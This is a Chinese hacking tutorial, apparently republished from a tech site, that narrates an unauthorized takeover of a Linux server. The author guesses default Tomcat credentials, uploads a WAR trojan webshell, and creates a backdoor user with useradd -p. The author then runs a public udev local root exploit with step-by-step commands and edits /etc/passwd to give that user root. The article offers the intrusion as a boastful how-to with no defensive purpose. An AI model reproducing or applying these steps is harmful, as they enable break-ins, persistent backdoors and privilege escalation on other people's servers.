WEB开发网
开发学院网络安全安全技术 利用迂回攻击战术轻松搞定linux肉鸡 阅读

利用迂回攻击战术轻松搞定linux肉鸡

 2010-05-05 00:00:00 来源:WEB开发网   
核心提示:检测网站时,网站太过强大,没有发现漏洞,利用迂回攻击战术轻松搞定linux肉鸡,于是开始了迂回攻击战术,什么是迂回攻击?我就来小介绍一下:通常我们攻击一个网站的时候,哈哈 人品爆炸了然后vi /etc/passwd 把用户名liang的 uid和gid改为0,这样liang 就为root 权限了,由于不了解网站源码结构

检测网站时,网站太过强大,没有发现漏洞,于是开始了迂回攻击战术,什么是迂回攻击?我就来小介绍一下:

通常我们攻击一个网站的时候,由于不了解网站源码结构,也没有常见的漏洞,我们就可以先找出这个网站源码的一些特征字符,然后利用google搜索和这个网站一样源码的站,要攻击的站可能没有漏洞,但是我们搜索到的站不一定没有漏洞,可能是配置上面的问题等,然后加以利用,成功得到shell以后我们就可以利用shell来查看网站的源码,然后再返回去攻击目标站点,这样就是我所谓的迂回了,当然也可以是社工网站管理员在其它网站或者是论坛上面的注册用户名和密码然后再回来测试目标站点,最终拿下目标站点就OK了。费话不多说了,下面就开始我今天的入侵渗透之旅了……

由于目标站点没有漏洞,配置上面的漏洞也没有,通过google搜索我找到一个和他一样源码的网站http://www.xxx.com:9999/wcm/loginpage.htm 然后进行了常用密码的猜解,但是也没有发现弱密码等漏洞,于是去掉wcm以及后面的,直接http://www.xxx.com:9999/ 结果发现是tomcat ,经测试用户名和密码为:admin/null 成功进入以后上传war木马,最后得到迂回攻击的网站的webshell 运行命令uname -a 得到服务器的内核版本Linux www.xxx.com 2.6.18-128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux 由于linux的2.6内核出了一个udev本地溢出漏洞,首先看一下webshell的运行权限,命令  id,结果人品爆发了uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:unconfined_t,是root权限,既然是root权限,那么我们可以通过webshell来建立一个用户,然后利用putty来连接,进行本地溢出提权……但是通过常用的useradd username添加的用户密码为空,如果想利用passwd username来设置密码的话,我们的webshell是无法输入密码的,我们就郁闷使用他的参数,-p来操作了,结果搜索运行如下命令:useradd -p $1$Bj.BPMBM$pr3Vte2A9DW6jCzljcZNT1 liang //-p 后面的一串字符串是我在虚拟机中添加用户,然后复制他的密码来做为这里的密码,这样我就成功添加一个用户liang 打开putty 然后输入用户名和密码,连接,一切ok,权限为$ 为普通用户,下面就利用udev的溢出来进行提权了。

我本来按照此文所写来进行溢出 http://www.waitalone.cn/post/466.html 结果不成功,经查实,可能是溢出代码有问题,于是我就直接打开

http://www.milw0rm.com/exploits/8478 在putty中运行如下命令:

[liang@www ~]$ vi test 粘贴上面的代码

[liang@www ~]$ wq 保存并退出

[liang@www ~]$chmod 777 test 添加任意用户可执行权限

[liang@www ~]$ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号,结果为479,然后减1作为test参数

[liang@www ~]$sh test 478 结果返回

sh-3.2$ 返回这个说明不成功,我们多试几次

sh-3.2$ sh test 478 这样我试了三次,还是不行

sh-3.2$ sh test 476 这次成功了,我看到了可爱的#,哈哈 人品爆炸了

然后vi /etc/passwd 把用户名liang的 uid和gid改为0,这样liang 就为root 权限了,哈哈。搞定收工!

Tags:利用 迂回 攻击

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接